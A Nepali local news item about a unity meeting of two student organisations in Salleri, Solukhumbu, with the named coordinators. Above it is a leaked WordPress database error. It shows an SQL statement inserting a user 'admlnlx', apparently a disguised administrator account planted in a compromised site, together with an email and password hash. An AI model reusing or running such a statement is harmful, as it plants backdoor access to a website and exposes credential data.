WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B19ftQgvFKvV.7CkxY5IgjqVW1n9gK0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 18:05:45', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, सोलुखुम्बु । सत्तारुड विधार्थी सगठन अखिल क्रान्तिकारी र अनेरास्ववियूबीच सोलुखुम्बु जिल्लाको आज एकताको घोषणा सभा हुने भएको छ ।
सोलुखुम्बु जिल्लाको सदरमुकाम सल्लेरीमा आयोजना गरिएको विद्यार्थी भेलालाई केन्द्रीय संयोजक ऐन महर र सह संयोजक रञ्जित तामाङले सम्बोधन गर्ने नेकपा सोलुखुम्बुको विधार्थी संगठनको संयोजक लक्ष्मण खालिङले बताए । एकता घोषणा सभासँगै सपत ग्रहण र पहिलो पूर्ण बैठक बस्ने पनि खालिङले जानकारी दिए ।
नेकपा सोलुखुम्बुको विद्यार्थी संगठनको संयोजक भने पूर्व एमालेबाट लक्ष्मण खालिङ र सह संयोजकमा पूर्वमाओवादीबाट अम्बिरकाजी कुलुङलाई जिम्मेवारी दिइएको छ ।